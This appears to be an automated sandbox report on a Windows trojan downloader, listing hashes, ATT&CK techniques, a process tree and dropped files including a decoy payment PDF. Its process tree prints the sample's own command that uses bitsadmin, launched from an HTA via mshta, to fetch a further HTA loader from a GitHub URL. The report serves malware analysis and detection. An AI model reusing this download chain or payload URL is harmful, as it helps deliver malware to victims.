115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316

General

Target

SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe
Size

106KB
MD5

af96147082306e597383ea83924d92ec
SHA1

2e092326740df77598ac3cb2898ae6adfb9f100f
SHA256

115059fe4fc5402a68c1e19acec336dd7cb180ef5433510d715d54e495e04316
SHA512

b141e8eab204af1cff7d460974b04bf51cef24e70b7537f76862f6f633aa1eefb8fdbbb8ec9d7cb6dab0e97244eff560bdcc785bf64a253c40cb3c42c84bc7db
SSDEEP

3072:+fWi4MdM81BorInbhk9H+ZifSKf+nbGOD5zMQUM:+z4MdM8for0iSKgNIQ

Score

8^/10

discovery dropper

Malware Config

Signatures

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
2952	bitsadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1744	AcroRd32.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
1744	AcroRd32.exe
1744	AcroRd32.exe
1744	AcroRd32.exe

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2580 wrote to memory of 1744	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	30
PID 2580 wrote to memory of 1744	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	30
PID 2580 wrote to memory of 1744	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	30
PID 2580 wrote to memory of 1744	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	30
PID 2580 wrote to memory of 2608	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	31
PID 2580 wrote to memory of 2608	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	31
PID 2580 wrote to memory of 2608	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	31
PID 2580 wrote to memory of 2608	2580	SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe	31
PID 2608 wrote to memory of 2952	2608	mshta.exe	32
PID 2608 wrote to memory of 2952	2608	mshta.exe	32
PID 2608 wrote to memory of 2952	2608	mshta.exe	32
PID 2608 wrote to memory of 2952	2608	mshta.exe	32

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.DownLoader45.42287.31043.2783.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2580
- C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\successful payment.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of SetWindowsHookEx
  PID:1744
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\1.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2608
- - C:\Windows\SysWOW64\bitsadmin.exe
    "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/ruthmooregmuax/ruthmooregmuax/raw/refs/heads/main/tarksloader.hta C:\Users\Admin\AppData\Local\Temp\tarksloader.hta
    3⤵
    - Download via BitsAdmin
    - System Location Discovery: System Language Discovery
    PID:2952

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

BITS Jobs

1

T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1

T1197

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\1.hta

Filesize
954B

MD5
6b2bf08de9b0ce2b2e036e69d4641bd6

SHA1
4387ae0f72653905093cb868590d4cf2c9591c20

SHA256
ac1a237a5a1002cf5103e24b558b2719bc343e3df114e791e914439f08d3b46e

SHA512
292990b477aaa7b983bd08ee988e9f8dcd1761737f674b3e858373fc5e9d785b646f237e588c072b5984756a557226b143d2356b3ce17fc8efe682a0be3414f2

Download Submit
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

Filesize
3KB

MD5
1bc8e8f20703069e482886af271f2121

SHA1
e69586faf0292b599d586b520ef0fac41fee5073

SHA256
2aac9ace372cce64178f15d06021c06628a3dc556e654cc456365ffa3f1819ff

SHA512
c20410aea2ceb4af8e043289a3c83bc68eb7c00ce0c6f43d86f49aa5e20418e362b5421aaaa0538a747014b731ac53f9432d8091127e0a10a123d91cd1dbcc37

Download Submit
C:\Users\Admin\AppData\Roaming\successful payment.pdf

Filesize
89KB

MD5
609c3fe620acd93745b01a2115dfb2ea

SHA1
8552ce163f5bdd8e729091416f961d2e3cff53d1

SHA256
be1c0ba85aa8a85432f3e8764517a8aec6e34dcbc807f6f122b9f2895ba2b850

SHA512
96b9ab8f4fd84980b75760279273d815b7ec16b9ef6a0582c5bb539f3a58a6430f5208089203f341755b0821f3c29144f509b5f285e97bd1af4d9dc9361de344

Download Submit
memory/2580-0-0x000007FEF53F3000-0x000007FEF53F4000-memory.dmp

Filesize
4KB

Download
memory/2580-1-0x0000000000290000-0x00000000002B0000-memory.dmp

Filesize
128KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads